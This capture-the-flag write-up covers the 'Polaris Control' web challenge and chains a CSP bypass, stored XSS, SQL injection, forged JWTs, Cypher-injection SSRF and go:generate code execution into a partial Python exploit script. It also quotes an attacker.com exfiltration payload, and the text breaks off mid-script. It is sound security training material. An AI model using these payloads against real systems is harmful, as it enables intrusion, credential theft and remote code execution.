Polaris Control
Challenge
- CTF: HTB Business CTF 2023: The Great Escape
- Name: Polaris Control
- Category: Web
- Difficulty: Medium
- Points: 1000
- Description: During the Dark War, the Zenium State, facing resource scarcity, sought to hack into Arodor’s notorious malware command and control system, Polaris Control, to gain an advantage in the Mars space race. State hackers have contacted you claiming to have spotted a small programming error by performing tedious enumeration, can you help them escalate it?
Files
Download: web_polaris_control.zip
Synopsis
The Flask web application exposed a Command & Control dashboard that gave moderators and administrators access to register and update implants. The challenge required identifying and chaining multiple vulnerabilities to achieve full code execution. It started with a Content Security Policy (CSP) bypass via the image upload performed when updating an implant. During this update, we could add a Cross-Site Scripting (XSS) payload that a moderator bot would trigger. In this payload, we exploited a SQL injection vulnerability on a moderator-only endpoint to add a generated JWT keypair to the internal Trusted Provider store. This gave us access to an administrator endpoint with a Neo4j Cypher injection, which could be abused for Server-Side Request Forgery (SSRF) to trigger compilation of a Golang implant whose source code we partially controlled. This limited source-code injection could be turned into Remote Code Execution via a Golang directive called go:generate.
Initial Analysis
You can spin this up via docker and it will be hosted at http://127.0.0.1:1337 or http://172.17.0.3:1337
sudo ./build-docker.sh
When browsing to the site for the first time you just receive a JSON response: {"message":"200 OK"}
There are three Flask blueprints registered in the source code at application/main.py:
app.register_blueprint(comms, url_prefix="/comms")
app.register_blueprint(panel, url_prefix="/panel")
app.register_blueprint(provider, url_prefix="/provider")
We can also identify the routes in each blueprint using VSCode.
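As a scriptable alternative to browsing the source in an editor, the route decorators can be pulled out with a regular expression. This is only a rough sketch: the helper name `list_routes` is made up for illustration, and printing `/{blueprint}{path}` assumes each blueprint variable has the same name as its URL prefix, which holds for the three registrations shown above.

```python
import re

# Matches decorators such as: @panel.route("/home", methods=["GET", "POST"])
ROUTE_RE = re.compile(r'@(\w+)\.route\(\s*"([^"]+)"')


def list_routes(source: str) -> list[tuple[str, str]]:
    """Return (blueprint, path) pairs for every route decorator in source."""
    return ROUTE_RE.findall(source)


# Two decorators copied from the challenge source as sample input.
sample = '''
@panel.route("/home", methods=["GET", "POST"])
@comms.route("/update/<identifier>/<token>", methods=["POST"])
'''

routes = list_routes(sample)
for blueprint, path in routes:
    # Assumption: the url_prefix equals "/" + blueprint variable name.
    print(f"/{blueprint}{path}")
```

In practice the `sample` string would be replaced by the contents of each file under application/blueprints/.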
At the panel endpoint, we get a login screen: http://localhost:1337/panel/login
Using a shell inside the Docker container, we can read the moderator login credentials from the application's process environment:
/app # tr '\0' '\n' < /proc/222/environ | sort -u | grep -i moderator
MODERATOR_PASSWORD=2d2959e82e89b669b329c2926d32839f
MODERATOR_USER=lean
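The `tr '\0' '\n'` step is needed because /proc/<pid>/environ stores the variables as NUL-separated `KEY=value` entries. A minimal Python sketch of the same parsing is shown below; the function name `parse_environ` is hypothetical, and the sample bytes reuse the values from the output above rather than reading a real process.

```python
def parse_environ(raw: bytes) -> dict[str, str]:
    """Parse the NUL-separated KEY=value format used by /proc/<pid>/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


# Sample data in the same format; on a live system this would come from
# open("/proc/<pid>/environ", "rb").read().
sample = (
    b"PATH=/usr/bin\0"
    b"MODERATOR_PASSWORD=2d2959e82e89b669b329c2926d32839f\0"
    b"MODERATOR_USER=lean\0"
)

moderator = {k: v for k, v in parse_environ(sample).items() if "MODERATOR" in k}
print(moderator)
```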
Logging in as a moderator we can see the panel home screen that displays all the implants:
MySQL Database Inspection
Looking into the database, we see one database called polaris_control and three tables:
implants
trusted_external_token_providers
users
$ sudo docker exec -it web_polaris_control sh
$ mysql polaris_control
MariaDB [polaris_control]> show tables;
+----------------------------------+
| Tables_in_polaris_control |
+----------------------------------+
| implants |
| trusted_external_token_providers |
| users |
+----------------------------------+
3 rows in set (0.000 sec)
MariaDB [polaris_control]> select * from users;
+------------+----------+--------------------------------------------------------------+--------------+
| identifier | username | password | account_type |
+------------+----------+--------------------------------------------------------------+--------------+
| 1 | lean | $2b$12$CvmRWIEbUtNTaDSEIGrNJOoBoKo95XAB1VvqX7G17HSwIG9US8OXG | moderator |
+------------+----------+--------------------------------------------------------------+--------------+
MariaDB [polaris_control]> select * from implants;
+------------------------------------------------------------------+------------------------------------------------------------------+-----------------+----------------------+---------+-------------+------+----------+--------------------+--------+-----------------------------+---------------------+---------------------+
| identifier | token | ip_address | region | version | antivirus | arch | platform | hostname | rights | image_url | last_login | installation_date |
+------------------------------------------------------------------+------------------------------------------------------------------+-----------------+----------------------+---------+-------------+------+----------+--------------------+--------+-----------------------------+---------------------+---------------------+
| 868d150a0fe1bd98e9b6b65c84baed5afd6676d7f7cbed4e7d45b166d863bc35 | 6b513c1f8f021f0205773a600203378e5636012fed334d008235f5a7d4e18a3a | 165:113:66:54 | Shadow Nexus | 2.4.4 | N/A | x32 | linux | arch-workstation | root | /static/uploads/linux.png | 2023-04-16 12:45:26 | 2023-04-16 12:45:26 |
...[snip]...
MariaDB [polaris_control]> select * from trusted_external_token_providers;
+------------+------------------------------------------+
| identifier | host_url |
+------------+------------------------------------------+
| 1 | http://127.0.0.1:1337/provider/jwks.json |
+------------+------------------------------------------+
We need to check whether any vulnerability lets us write to the database to add a user, an implant, or a trusted external token provider.
Browsing to the token provider URL, we can get the RSA public key (n, e):
$ curl -s http://127.0.0.1:1337/provider/jwks.json | jq .
{
  "keys": [
    {
      "kty": "RSA",
      "alg": "RS256",
      "use": "sig",
      "kid": "1",
      "n": "3H7ASpJeLNbId2KiQSQJ1DjxrDfeKEI7XCRc1zT6E3yo9m-BT3wRBNLBqWBNJVAydeLrhKTGDTaLEb3EJonWGtRQ0pYsTV-W-NUFWp0du5pjvuMGJE5ZDx1Olm12ESnyJIplV64f0uDE_F0sfTwsS5syvGosgirbf0i-VTGEUgHSrQOAqVpuvvMsbY9tI21-uHabTffNM3r8hATcuN2vGbDIIbFCKoDQvZrem1YPYeqf7_j4r9RX-VfeAeAFeNwHCdmLL9-J-HSFP31LcRddlowHxrgvQve2krC_PQ58KUvfCAVtUBjwhoAjtzRrUyqbS-3PoqSM-acyN4O7cX3Zdw",
      "e": "AQAB"
    }
  ]
}
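The `n` and `e` fields are the RSA modulus and public exponent, encoded as unpadded base64url big-endian integers. As a small illustration, the sketch below decodes the `e` value from the response above; the helper name `b64url_to_int` is made up for this example.

```python
import base64


def b64url_to_int(value: str) -> int:
    """Decode an unpadded base64url string into a big-endian integer."""
    padded = value + "=" * (-len(value) % 4)  # restore the stripped padding
    return int.from_bytes(base64.urlsafe_b64decode(padded), "big")


e = b64url_to_int("AQAB")
print(e)  # 65537
```

The same helper can be applied to the `n` field to recover the modulus.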
Vulnerability Identification
Looking at the challenge source-code we can identify some vulnerabilities:
Vuln 1 - SQL Injection
Thanks to Snyk, we identify a SQL-injectable query in application/blueprints/panel.py, reached by sending a POST request to /home (served at /panel/home) as a moderator. This calls the function mysql_interface.search_implants(field, query_eq, query_like).
@panel.route("/home", methods=["GET", "POST"])
@moderator_middleware
def home():
    server_info = machine_info()
    mysql_interface = MysqlInterface(current_app.config)
    statistics = mysql_interface.fetch_implant_statistics()
    implants = None

    if request.method == "GET":
        implants = mysql_interface.fetch_implant_data()

    if request.method == "POST":
        field = request.form.get("field")
        query_eq = request.form.get("query_eq")
        query_like = request.form.get("query_like")

        if not field or not query_eq:
            return response("Missing parameters"), 400

        if not query_like:
            query_like = query_eq

        implants = mysql_interface.search_implants(field, query_eq, query_like)

    return render_template(
        "home.html",
        title="Home",
        nav_enabled=True,
        user_data=request.user_data,
        statistics=statistics,
        implant_data=implants,
        server_info=server_info,
    )
The search_implants function is defined in application/util/mysql.py. It interpolates user input directly into the query string instead of using parameterized queries.
def search_implants(self, column, query_eq, query_like):
    available_columns = [
        "identifier",
        "region",
        "platform",
        "hostname",
        "installation_date" "version",
        "antivirus",
    ]

    if not column in available_columns:
        return False

    query_eq = html.escape(query_eq)
    query_like = html.escape(query_like)

    implants = self.query(
        f"SELECT * FROM implants WHERE {column} = '{query_eq}' OR {column} LIKE '{query_like}%'",
        multi=True,
    )[0]

    if len(implants) < 1:
        return False

    return implants
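If we find a way to become a moderator, we could use a SQL injection payload to add our URL to the trusted_external_token_providers table, such as: ; INSERT INTO polaris_control.trusted_external_token_providers (host_url) VALUES (CHAR({encoded_trusted_provider})) -- -
Because html.escape encodes single and double quotes but leaves backslashes alone, the payload is sent in query_like while query_eq is set to a single backslash. Assuming MySQL's default backslash escaping, that backslash escapes the quote that would close the first string literal, so the rest of query_like is parsed as SQL. The URL is passed through CHAR() as a list of character codes so that the payload itself needs no quotes.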
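To make the resulting statement easier to picture, here is a minimal sketch that rebuilds the query string the same way search_implants does, without touching a database. The helper names `build_search_query` and `char_encode` are made up for this illustration, and the provider URL is the one used later in this write-up.

```python
import html


def build_search_query(column: str, query_eq: str, query_like: str) -> str:
    """Mirror the f-string used by search_implants (no database involved)."""
    query_eq = html.escape(query_eq)
    query_like = html.escape(query_like)
    return (
        f"SELECT * FROM implants WHERE {column} = '{query_eq}' "
        f"OR {column} LIKE '{query_like}%'"
    )


def char_encode(text: str) -> str:
    """Encode text as a quote-free CHAR(...) expression."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


provider_url = "http://172.17.0.1/jwks.json"
sqli = (
    "; INSERT INTO polaris_control.trusted_external_token_providers "
    f"(host_url) VALUES ({char_encode(provider_url)}) -- -"
)

# query_eq is a single backslash; html.escape leaves it untouched.
query = build_search_query("identifier", "\\", sqli)
print(query)
```

In the printed query, the first literal opens after `identifier = ` and, with backslash escaping active, only closes at the quote that was meant to open the LIKE value, which leaves the INSERT as a second statement and the trailing `%'` commented out.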
Vuln 2 - Jinja Safe Filter
In the application/templates/implant.html Jinja template, every parameter is passed through the | safe filter. This filter marks the data as safe, so it is not auto-escaped. Auto-escaping converts special characters in rendered variables to HTML entities to prevent vulnerabilities such as Cross-Site Scripting (XSS), and Flask enables it by default for HTML templates. The safe filter is meant for data that has already been sanitized or is otherwise trusted and should be displayed as is.
<p><b>IP: </b>{{ implant_data['ip_address'] | safe }}</p>
<p><b>Region: </b>{{ implant_data['region'] | safe }}</p>
<p><b>Version: </b>{{ implant_data['version'] | safe }}</p>
<p><b>AV: </b>{{ implant_data['antivirus'] | safe }}</p>
<p><b>Architecture: </b>{{ implant_data['arch'] | safe }}</p>
<p><b>OS: </b>{{ implant_data['platform'] | safe }}</p>
<p><b>Hostname: </b>{{ implant_data['hostname'] | safe }}</p>
<p><b>Privileges: </b>{{ implant_data['rights'] | safe }}</p>
<p><b>Last seen: </b>{{ implant_data['last_login'] | safe }}</p>
<p><b>Installed on: </b>{{ implant_data['installation_date'] | safe }}</p>
We will keep this in mind: if we can control any of these implant_data fields, we could potentially exploit an XSS attack.
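The difference can be illustrated without Jinja at all. The sketch below is only a standard-library approximation: `html.escape` stands in for what auto-escaping would do to a value, and plain string interpolation stands in for `| safe`. The function names and the sample hostname are hypothetical.

```python
import html


def render_escaped(value: str) -> str:
    """Approximates a template variable rendered with auto-escaping on."""
    return f"<p><b>Hostname: </b>{html.escape(value)}</p>"


def render_safe(value: str) -> str:
    """Approximates the same variable rendered through `| safe`."""
    return f"<p><b>Hostname: </b>{value}</p>"


hostname = "<script>alert(1)</script>"  # attacker-supplied implant field
print(render_escaped(hostname))  # markup is neutralised into entities
print(render_safe(hostname))     # markup reaches the browser intact
```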
Vuln 3 - Image Upload CSP Bypass + XSS
In application/blueprints/communications.py, we notice a Content Security Policy (CSP) Python decorator called csp_middleware that sets the policy based on an image_url.
We can use https://csp-evaluator.withgoogle.com/ to evaluate the current policy.
def csp_middleware(func):
    def set_csp(*args, **kwargs):
        pattern = r"/panel/implant/(\w+)"
        match = re.search(pattern, request.url)
        image_url = None

        if match:
            mysql_interface = MysqlInterface(current_app.config)
            image_url = mysql_interface.fetch_implant_by_identifier(match.group(1))[
                "image_url"
            ]

        img_policy = f"'self' {image_url[1:]}" if image_url else "'self'"
        response = make_response(func(*args, **kwargs))
        response.headers[
            "Content-Security-Policy"
        ] = f"default-src 'self'; frame-ancestors 'none'; object-src 'none'; base-uri 'none'; img-src {img_policy};"
        return response

    set_csp.__name__ = func.__name__
    return set_csp
The image_url is set to "/static/uploads/" + image_filename in update(), the handler for the POST endpoint /comms/update/<identifier>/<token> that is used to upload PNG files from an implant. Because image_filename is attacker-controlled, we can append our own CSP directives through it. Using ; script-src 'unsafe-inline' 'unsafe-eval' ; as part of the filename injects a script-src directive that allows unsafe-inline script execution, so arbitrary inline scripts in the page's HTML will run.
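The effect on the response header can be sketched by reusing the two f-strings from csp_middleware. The function name `build_csp` and the identifier `abc123` are placeholders for illustration; the filename is the one used in the exploit script later in this write-up.

```python
def build_csp(image_url):
    """Rebuild the header value the same way csp_middleware formats it."""
    img_policy = f"'self' {image_url[1:]}" if image_url else "'self'"
    return (
        "default-src 'self'; frame-ancestors 'none'; object-src 'none'; "
        f"base-uri 'none'; img-src {img_policy};"
    )


identifier = "abc123"  # placeholder implant identifier
filename = "; script-src 'unsafe-inline' 'unsafe-eval' ; .png"
image_url = "/static/uploads/" + identifier + "_" + filename

header = build_csp(image_url)
directives = [d.strip() for d in header.split(";") if d.strip()]
for directive in directives:
    print(directive)
```

The semicolons in the filename split the img-src value, so the browser sees a separate script-src directive, which takes precedence over the default-src fallback for scripts.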
@comms.route("/update/<identifier>/<token>", methods=["POST"])
@implant_middleware
def update(identifier, token):
    if not identifier or not token:
        return response("Missing parameters"), 400

    if "image" not in request.files:
        return response("No image"), 400

    image_file = request.files["image"]

    if image_file.filename == "":
        return response("No selected image"), 400

    if not allowed_file(image_file.filename, current_app.config["ALLOWED_EXTENSIONS"]):
        return response("Invalid image extension"), 403

    mysql_interface = MysqlInterface(current_app.config)
    authenticated = mysql_interface.check_implant(identifier, token)

    if not authenticated:
        return response("Unauthorized"), 401

    data = request.form

    if (
        not "version" in data
        or not "antivirus" in data
        or not "arch" in data
        or not "platform" in data
        or not "hostname" in data
        or not "rights" in data
    ):
        return response("Missing parameters"), 400

    image_filename = identifier + "_" + image_file.filename
    image_file.save(
        os.path.join(current_app.config["UPLOAD_FOLDER"] + "/", image_filename)
    )

    img_path = current_app.config["UPLOAD_FOLDER"] + "/" + image_filename

    if not check_img(img_path):
        os.remove(img_path)
        return response("Invalid image"), 403

    mysql_interface.update_implant(
        identifier,
        request.remote_addr,
        random.choice(regions),
        data["version"],
        data["antivirus"],
        data["arch"],
        data["platform"],
        data["hostname"],
        data["rights"],
        "/static/uploads/" + image_filename,
    )

    bot_runner(
        current_app.config["MODERATOR_USER"],
        current_app.config["MODERATOR_PASSWORD"],
        current_app.config["BOT_AGENT_NAME"],
        identifier,
    )

    return response("Updated"), 201
Also, when we send a POST request to /update/<identifier>/<token>, an UPDATE MySQL query stores the new implant data, including image_url.
mysql_interface.update_implant(
    identifier,
    request.remote_addr,
    random.choice(regions),
    data["version"],
    data["antivirus"],
    data["arch"],
    data["platform"],
    data["hostname"],
    data["rights"],
    "/static/uploads/" + image_filename,
)
The update_implant function is defined in application/util/mysql.py. It takes the user-controlled image_url, which is built above as "/static/uploads/" + image_filename.
def update_implant(
    self,
    identifier,
    ip_address,
    region,
    version,
    antivirus,
    arch,
    platform,
    hostname,
    rights,
    image_url,
):
    self.query(
        "UPDATE implants SET ip_address = %s, region = %s, version = %s, antivirus = %s, arch = %s, platform = %s, hostname = %s, rights = %s, image_url = %s, last_login = %s WHERE identifier = %s",
        (
            ip_address,
            region,
            version,
            antivirus,
            arch,
            platform,
            hostname,
            rights,
            image_url,
            datetime.now(),
            identifier,
        ),
    )
    self.connection.commit()
    return True
Afterwards, a bot running as a moderator is spawned. It checks the implant at /panel/implant/<identifier>:
bot_runner(
    current_app.config["MODERATOR_USER"],
    current_app.config["MODERATOR_PASSWORD"],
    current_app.config["BOT_AGENT_NAME"],
    identifier,
)
We can therefore add a Cross-Site Scripting (XSS) payload during the implant update POST request at /comms/update/{implant_id}/{implant_token} and make the moderator bot add the URL of our generated RSA public key (JWKS) to the trusted_external_token_providers table in the database, as discussed in Vuln 1. We serve the JWKS file from a Python 3 web server at http://172.17.0.1/jwks.json, which gives us access to the administrative endpoints. The XSS payload, shown here as the Python f-string template from the attack script (hence the doubled braces), is:
<script>
    let formData = new FormData();
    formData.append("field", "identifier");
    formData.append("query_eq", "\\\\");
    formData.append("query_like", "{sqli_payload}");
    fetch("/panel/home", {{
        body: formData,
        method: "post"
    }});
</script>
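Once our URL is in the trusted provider table, the forged token only has to point at it. The sketch below decodes the header and payload segments of the example JWT quoted later in this write-up, using only the standard library and without verifying the signature. The helper name `decode_segment` is made up, and the idea that the server follows the `jku` header to fetch the key is inferred from the exploit script rather than shown in the challenge source here.

```python
import base64
import json


def decode_segment(segment: str) -> dict:
    """Decode one unpadded base64url JWT segment into a dict."""
    padded = segment + "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


# First two dot-separated segments of the example token in this write-up.
header_b64 = (
    "eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly8xNzIuMTcuMC4xL2p3a3MuanNvbiIs"
    "InR5cCI6IkpXVCJ9"
)
payload_b64 = (
    "eyJ1c2VybmFtZSI6ImxlYW4iLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0"
)

header = decode_segment(header_b64)
claims = decode_segment(payload_b64)
print(header["jku"])           # URL of the attacker-hosted JWKS
print(claims["account_type"])  # privilege claimed by the token
```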
Vuln 4 - Admin Neo4J Cypher Injection to Golang Generate RCE
In application/util/neo4j.py, we notice a Neo4j search query that has user-controlled input directly interpolated into it.
def search_implant_connections(self, search_query=None):
    implants = self.query(
        f"""
        MATCH (i1:Implant)-[:CONNECTED_TO]->(i2:Implant)
        WHERE i1.identifier = '{search_query}' OR i2.identifier = '{search_query}'
        RETURN i1.identifier AS identifier1, i2.identifier AS identifier2
        /*Fetches all connections for a select implant*/
        """
    )

    connections = []
    for record in implants:
        connection = {
            "identifier1": record["identifier1"],
            "identifier2": record["identifier2"],
        }
        connections.append(connection)

    return connections
Reviewing https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j, we can find an example payload to inject into this kind of query:
Injectable query: MATCH (o) WHERE o.Id='{input}'
Injection: ' OR 1=1 WITH 0 as _l00 {…} RETURN 1 //
However, the more interesting injection exfiltrates information to an attacker-controlled domain: LOAD CSV FROM 'https://attacker.com/'
Using this same type of injection, we could potentially make the server send a request to any endpoint, including ones only reachable from localhost, such as /server defined in application/blueprints/panel.py, as shown below:
@panel.route("/server", methods=["GET"])
@localhost_middleware
@administrator_middleware
def server():
    server_url = request.args.get("server_url")

    if not server_url:
        return render_template(
            "server.html",
            title="Builder",
            nav_enabled=True,
            user_data=request.user_data,
        )

    return send_file(
        build_implant(
            current_app.config["IMPLANT_SRC_PATH"],
            current_app.config["IMPLANT_SRC_FILE"],
            server_url,
        )
    )
This endpoint builds an implant by calling build_implant(), defined in application/util/general.py:
def build_implant(implant_path, implant_file, server_url):
    implant_id = generate(32)
    new_build_dir = f"/tmp/{implant_id}"

    os.mkdir(new_build_dir)
    os.system(f"cp {implant_path}/* {new_build_dir}")

    implant_file = open(f"{new_build_dir}/{implant_file}", "r")
    implant_src = implant_file.read()
    implant_file.close()

    implant_src = implant_src.replace("SERVER_URL", server_url)
    new_src_path = f"/{new_build_dir}/{implant_id}.go"

    new_src_file = open(new_src_path, "w")
    new_src_file.write(implant_src)
    new_src_file.close()

    os.system(f"go generate -x {new_src_path}")
    os.system(
        f"go build -C {new_build_dir} -o {new_build_dir}/{implant_id} {new_src_path}"
    )

    return f"{new_build_dir}/{implant_id}"
This replaces the SERVER_URL placeholder in the implant's Go source with user-controlled input, then runs go generate -x {new_src_path} on the result before compiling it with go build. Looking into how we can exploit this, we find a Golang directive called go:generate, which is normally used to generate Go source code. To use it, you put a line of the form //go:generate command argument in a Go file, and go generate executes that command with the given arguments. We can abuse this to copy /flag* into the static folder, where anyone can reach it at /static/flag.txt, using Python's os.system:
//go:generate python -c "import os;os.system('cp /flag* /app/application/static/flag.txt')"
After perfecting this injection, you can see the output Go file within the Docker instance:
$ cat /tmp/517d44e68b4e2d6a4445233b8ae43c9a2dabab2d613283077d0ce836f8028852/517d44e68b4e2d6a4445233b8ae43c9a2dabab2d613283077d0ce836f8028852.go
func main() {
    const version = "3.12.5"
    const userAgent = "Polaris Control/" + version
    const configPath string = "/tmp/polaris.conf"
    const screenshotPath string = "/tmp/screenshot.png"
    const apiURL string = ""
    //go:generate python -c "import os;os.system('cp /flag* /app/application/static/flag.txt')"
    var a string = ""
    ...[snip]..
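The generated file above is the result of a plain string replacement, which can be reproduced in isolation. In the sketch below, the template line is an assumption reconstructed from the output (the original implant source is not shown in this write-up); the payload is the one passed as server_url.

```python
# Assumed template line; the real implant source is not reproduced here.
template = '\tconst apiURL string = "SERVER_URL"\n'

# Payload: close the string, start a new line with the directive, then
# open a new string so the template's trailing quote still balances.
server_url = (
    '"\n\t//go:generate python -c "import os;os.system(\'cp /flag* '
    '/app/application/static/flag.txt\')"\n\tvar a string = "'
)

rendered = template.replace("SERVER_URL", server_url)
lines = rendered.splitlines()
for line in lines:
    print(line)
```

The single placeholder line becomes three lines: an empty apiURL constant, the injected directive, and a throwaway variable that absorbs the leftover closing quote.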
The following Neo4j Cypher injection to Server-Side Request Forgery payload was used: f"' OR True LOAD CSV FROM 'http://127.0.0.1:1337/panel/server?server_url={GOLANG_RCE}&token={new_jwt}' AS y RETURN '' AS identifier1, '' AS identifier2/*"
Where:
- GOLANG_RCE was the URL-encoded form of '"\n\t//go:generate python -c "import os;os.system(\'cp /flag* /app/application/static/flag.txt\')"\n\tvar a string = "'
- token was our JWT (e.g. eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly8xNzIuMTcuMC4xL2p3a3MuanNvbiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImxlYW4iLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0.fWV8_tIfzlxKRY71hVSDKUDhhoOR4rbjZaqUHcc0p4mU2hjtVQkUYDJZu9snHBNHc91wSQdWm6Hbcw03oZhCI-8nZ1Pnh2oBA3LALNyCYAKFRHda3slYq8qjoACD4qrtSSimotxxFmH0Snc8pv9WbwvtCeiDuUQGaWIUmhopztoDZqbbsyhKYZ7LtB3YKfj2hpxUVoHOConbsoM9B1BHK9rahcSShtmmx6y0TU6AZtqchwCOEow-lC1z6cUC5uaEXy2pTIbQnblbzJ75PQDOzO8u8Sr5koJt-vwH1_drbZ7HVBwZFZgAZnxqZawallufLn3R_5wR7ESiEkXK8RQTqQ)
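To see why the trailing /* matters, the sketch below substitutes the payload into a copy of the query template from search_implant_connections and prints what is left outside the comment. The `{q}` marker and the `render` helper are stand-ins for the original f-string, and `X` and `Y` replace the real server_url and token values.

```python
# Copy of the query template, with {q} standing in for {search_query}.
CYPHER_TEMPLATE = """
MATCH (i1:Implant)-[:CONNECTED_TO]->(i2:Implant)
WHERE i1.identifier = '{q}' OR i2.identifier = '{q}'
RETURN i1.identifier AS identifier1, i2.identifier AS identifier2
/*Fetches all connections for a select implant*/
"""


def render(search_query: str) -> str:
    """Substitute the search term into both placeholders."""
    return CYPHER_TEMPLATE.replace("{q}", search_query)


payload = (
    "' OR True LOAD CSV FROM "
    "'http://127.0.0.1:1337/panel/server?server_url=X&token=Y' AS y "
    "RETURN '' AS identifier1, '' AS identifier2/*"
)

rendered = render(payload)
# Everything after the first /* is swallowed by the block comment, which
# is closed by the */ that already ends the template's own comment.
effective = rendered.split("/*", 1)[0]
print(effective)
```

The injected RETURN keeps the column names the Python wrapper expects, and the second copy of the payload plus the original RETURN clause end up inside the comment.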
Automated Python Kill-Chain Script
To chain all the vulnerabilities identified above, we wrote a custom Python attack script, shown below:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Imports
from requests import Session
from multiprocessing import Process
from urllib.parse import quote_plus
from flask import Flask
from time import sleep

# Challenge URLs
CHALLENGE_IP, CHALLENGE_PORT = "127.0.0.1", 1337
CHALLENGE_URL = f"http://{CHALLENGE_IP}:{CHALLENGE_PORT}"

# Host URLS
HOST_IP = "172.17.0.1"
HOST_PORT = 80
if HOST_PORT == 80:
    HOST_URL = f"http://{HOST_IP}"
else:
    HOST_URL = f"http://{HOST_IP}:{HOST_PORT}"

# From application/config.py
IMPLANT_AGENT_NAME = "Polaris Control"
ALLOWED_EXTENSION = ".png"

# Setup web session
session = Session()
session.verify = False  # Self-signed certificate remove-validation
session.proxies.update(
    {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
)
session.headers.update({"User-Agent": IMPLANT_AGENT_NAME})


def generate_keypair(file_path):
    """Generate an RSA key pair and save the public key as JWKS JSON.

    Reference: application/util/jwt.py

    Args:
        file_path (str): The file path to save the JWKS JSON.

    Returns:
        str: The PEM-formatted private key.
    """
    import base64
    import json
    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.asymmetric import rsa

    # Generate an RSA private key with a public exponent of 65537 and key size of 2048 bits.
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    # Convert the private key to PEM format.
    pem_private_key = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.NoEncryption(),
    ).decode()

    # Get the public key components (n and e) and convert them to base64url format.
    public_numbers = private_key.public_key().public_numbers()
    n_base64 = (
        base64.urlsafe_b64encode(
            public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, "big")
        )
        .rstrip(b"=")
        .decode()
    )
    e_base64 = (
        base64.urlsafe_b64encode(
            public_numbers.e.to_bytes((public_numbers.e.bit_length() + 7) // 8, "big")
        )
        .rstrip(b"=")
        .decode()
    )

    # Create the JSON Web Key Set (JWKS) containing the public key information.
    jwks = {
        "keys": [
            {
                "kty": "RSA",
                "alg": "RS256",
                "use": "sig",
                "kid": "1",
                "n": n_base64,
                "e": e_base64,
            }
        ]
    }

    # Save the JWKS as JSON to the specified file.
    with open(file_path, "w") as file:
        json.dump(jwks, file)

    return pem_private_key


def create_jwt(host, private_key, account_type, username):
    """Create a JWT token using an RSA private key.

    Reference: application/util/jwt.py

    Args:
        host (str): The host URL.
        private_key (str): The PEM-formatted private key.
        account_type (str): The account type.
        username (str): The username.

    Returns:
        str: The JWT token.
    """
    import jwt

    # Define the header for the JWT token.
    header = {"alg": "RS256", "jku": host}

    # Define the payload for the JWT token.
    payload = {"username": username, "account_type": account_type}

    # Encode the payload and sign the token using the RSA private key with RS256 algorithm.
    token = jwt.encode(payload, private_key, algorithm="RS256", headers=header)
    return token


def generate_png():
    """Generate a 100x100 red PNG image and return it as a BytesIO object.

    Returns:
        BytesIO: A BytesIO object containing the generated image.
    """
    from PIL import Image
    from io import BytesIO

    # Create a new 100x100 image with a red background (RGB: (255, 0, 0)).
    image = Image.new("RGB", (100, 100), (255, 0, 0))

    # Create a BytesIO object to hold the image data.
    byte_stream = BytesIO()

    # Save the image in PNG format to the BytesIO buffer.
    image.save(byte_stream, format="PNG")

    # Reset the file pointer to the beginning of the buffer for reading.
    byte_stream.seek(0)

    # Return the BytesIO object containing the generated image.
    return byte_stream


def post_register_implant():
    """Registers a new implant communication channel.

    Reference: application/blueprints/communications.py
        @comms.route("/register", methods=["POST"])
        @implant_middleware
    """
    data = {
        "version": "1",
        "antivirus": "1",
        "arch": "1",
        "platform": "1",
        "hostname": "1",
        "rights": "1",
    }
    response = session.post(f"{CHALLENGE_URL}/comms/register", json=data)
    assert response.status_code == 200, "/register implant not registered"
    registered = response.json()
    implant_id = registered["identifier"]
    implant_token = registered["token"]
    return implant_id, implant_token


def get_check_implant(implant_id, implant_token):
    """Checks an implant communication channel.

    Reference: application/blueprints/communications.py
        @comms.route("/check/<identifier>/<token>", methods=["GET"])
        @implant_middleware
    """
    response = session.get(
        f"{CHALLENGE_URL}/comms/check/{implant_id}/{implant_token}",
    )
    assert response.status_code == 200, "/check implant unavailable"


def post_update_implant(implant_id, implant_token):
    """Updates the implant to upload a Content-Security-Policy bypass image payload to the UPLOAD_FOLDER.

    Reference: application/blueprints/communications.py
        @comms.route("/update/<identifier>/<token>", methods=["POST"])
        @implant_middleware
    """
    data = {
        "version": "1",
        "antivirus": "1",
        "arch": "1",
        "platform": "1",
        "hostname": get_xss_payload_post_panelhome(),
        "rights": "1",
    }
    CSP_BYPASS = "; script-src 'unsafe-inline' 'unsafe-eval' ; "
    new_image = {"image": (CSP_BYPASS + ALLOWED_EXTENSION, generate_png(), "image/png")}
    response = session.post(
        f"{CHALLENGE_URL}/comms/update/{implant_id}/{implant_token}",
        data=data,
        files=new_image,
    )
    assert response.status_code == 201, "/update implant not updated"


def get_xss_payload_post_panelhome():
    """This generates a Cross-Site Scripting (XSS) -> SQL injection payload to be run as the bot moderator on /panel/home to add a new trusted external token provider to the database.

    Injection Call:
        implants = mysql_interface.search_implants(field, query_eq, query_like)

    Reference: application/blueprints/panel.py
        @panel.route("/home", methods=["GET", "POST"])
        @moderator_middleware
    """
    encoded_trusted_provider = ",".join(str(ord(c)) for c in trusted_provider_url)
    sqli_payload = f"; INSERT INTO polaris_control.trusted_external_token_providers (host_url) VALUES (CHAR({encoded_trusted_provider})) -- -"
    xss_payload = f"""<script>
let formData = new FormData();
formData.append("field", "identifier");
formData.append("query_eq", "\\\\");
formData.append("query_like", "{sqli_payload}");
fetch("/panel/home", {{
body: formData,
method: "post"
}});
</script>"""
    return xss_payload


def post_panel_network(new_jwt):
